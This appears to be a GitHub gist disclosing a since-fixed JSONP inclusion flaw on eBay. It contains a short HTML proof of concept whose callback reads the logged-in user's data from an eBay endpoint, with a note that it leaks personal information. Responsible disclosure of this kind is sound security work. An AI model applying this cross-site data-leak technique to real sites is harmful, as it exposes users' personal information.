Skip to content

Instantly share code, notes, and snippets.

@toufik-airane
Last active March 14, 2016 00:44
Show Gist options
  • Save toufik-airane/9db58eee8d046f16253a to your computer and use it in GitHub Desktop.
Save toufik-airane/9db58eee8d046f16253a to your computer and use it in GitHub Desktop.
Ebay JSONP Inclusion Responsible Disclosure
<!--
1 * Connect to Ebay
2 * Execute this snippet
3 * leak personal informations
UPDATE 14/03/2016: Bug fixed
Thank you for joined eBay Security Researchers Hall Of Fame
http://ebay.com/securitycenter/ResearchersAcknowledgement.html
-->
<script>
function mycallback(data) {
alert("Hello " + data.u + " ");
}
</script>
<script src="http://my.ebay.com/ws/eBayISAPI.dll?GetGHNotificationsCommand&ghud=1&callback=mycallback"></script>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment